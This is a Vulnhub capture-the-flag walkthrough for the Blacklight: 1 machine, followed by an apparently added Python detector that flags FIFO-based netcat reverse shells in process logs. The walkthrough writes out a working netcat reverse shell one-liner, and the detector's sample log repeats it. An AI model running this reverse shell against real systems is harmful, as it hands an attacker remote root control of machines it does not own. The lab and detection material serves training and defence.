Blacklight: 1 | Vulnhub Walkthrough

Dot Dot Slash

Blacklight is the easiest virtual machine you can imagine on Vulnhub. Designed by Carter B, this box is for you, if you are absolutely new to the art. I will not recommend this one for experienced folks. I pwned this box in 10 mins.

Level: Sanity Check

I ran arp-scan to figure out the IP address of the box.

Ran arp-scan to figure out the target IP

The tale of a premature root

Nmap scans identified one HTTP service and an unknown service on port 9072. Nmap fingerprints of that port looked like some sort of console application. The main site had nothing special in it.

Detailed nmap scan

main site

On enumeration, I figured out that the application had a robots.txt file hosted. There was one dictionary file that looked useful for password cracking and the first flag.

Entries in robots.txt
First flag

The flag file had references to port 9072. I tried out the unknown service using telnet. There were two commands: one for executing a command and the other for reading a hash. However, the console application allowed only two commands to be issued, after which the service exits.

Console application on port 9072

I tried executing a reverse shell payload and I got root access. Honestly, I didn't feel like searching for other flags. This machine is too easy and it's not worth my effort.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f

Executing reverse shell payload
Obtained reverse connection
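
From the defender's side, the one-liner above leaves a recognizable shape in process-creation telemetry: a FIFO is created, a shell runs in the pipeline, and netcat's output is redirected back into that same FIFO. The Python below is an added example, not part of the original walkthrough; the log record format, the host and user names, and the function names are assumptions made for illustration.

```python
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NETCATS = {"nc", "ncat", "netcat"}
REDIRECT = re.compile(r"\d*>+\s*(&\d|\S+)")  # '>/tmp/f', '2>&1', '>> out'

def find_fifo_shell(cmdline):
    """Return FIFO path and remote endpoint when a shell is wired to netcat via a FIFO."""
    fifos, shell_seen = set(), False
    # Walk the one-liner stage by stage, splitting on ';', '&&', '||' and '|'.
    for stage in re.split(r";|&&|\|\||\|", cmdline):
        targets = [t for t in REDIRECT.findall(stage) if not t.startswith("&")]
        try:
            words = shlex.split(REDIRECT.sub(" ", stage))
        except ValueError:  # unbalanced quotes: cannot tokenize this stage
            continue
        if not words:
            continue
        prog = words[0].rsplit("/", 1)[-1]
        if prog == "mkfifo":
            fifos.update(w for w in words[1:] if not w.startswith("-"))
        elif prog in SHELLS:
            shell_seen = True
        elif prog in NETCATS and shell_seen:
            hit = fifos.intersection(targets)  # netcat output fed back into the FIFO
            args = [w for w in words[1:] if not w.startswith("-")]
            if hit and len(args) >= 2:
                return {"fifo": hit.pop(), "remote_host": args[-2], "remote_port": args[-1]}
    return None

# Constructed process-creation records: "<host> <user> <command line>"
SAMPLE_LOG = [
    "blacklight root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f",
    "web01 backup mkfifo /tmp/logpipe; gzip -c < /tmp/logpipe > /var/tmp/app.log.gz",
    "web01 ops nc -z 10.0.0.5 22",
    "web01 ops sh -c 'uptime' | nc 10.0.0.5 9000 > /tmp/out.txt",
]

def scan(lines):
    """Return one alert per record whose command line matches the FIFO pattern."""
    alerts = []
    for line in lines:
        host, user, cmdline = line.split(" ", 2)
        finding = find_fifo_shell(cmdline)
        if finding:
            alerts.append({"host": host, "user": user, **finding})
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Requiring the FIFO, the shell and the netcat redirect together keeps the benign `mkfifo` and plain `nc` records in the sample from alerting.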

Blacklight is a very easy challenge. It is only suitable for absolute beginners. I wish the author had integrated some exploitation scenarios or privilege escalation vectors into the box.